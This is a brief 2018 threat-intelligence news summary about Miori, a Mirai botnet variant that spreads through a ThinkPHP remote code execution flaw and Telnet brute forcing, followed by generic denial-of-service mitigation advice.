With Mirai Comes Miori: IoT Botnet Delivered via ThinkPHP Remote Code Execution
(Dec 20, 2018)
Trend Micro researchers have published their analysis on a variant of the "Mirai" Internet-of-Things (IoT) malware called "Miori." Multiple Mirai various have appeared since the malware's source code was leaked in 2016. The Miori malware was found to be propagating itself via "a Remote Code Execution (RCE) vulnerability in the PHP framework, ThinkPHP." The vulnerability has been observed being utilized by other Mirai variants (APEP, IZ1H9) for which the details were first mentioned on December 11, 2018. The vulnerability affects ThinkPHP versions before "5.0.23 and 5.1.31." Additionally, researchers found that the actors behind Miori "used the Thinkpad RCE to make vulnerable machines download and execute their malware," and subsequently initiate the "Telnet" protocol to brute force other IPs.
Recommendation: Denial-of-service attacks can potentially cost your company loss in revenue because severe attacks can shut down online services for extended periods of time. With the leak of the Mirai botnet source code in October, the availability for threat actors to compromise vulnerable devices, and purchase DDoS for hire is a continually evolving threat. Mitigation technique can vary depending on the specifics of the attack. For example, in the case of BlackNurse, which can disrupt enterprise firewalls, ICMP type 3 traffic should be blocked, or at least rate limited.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.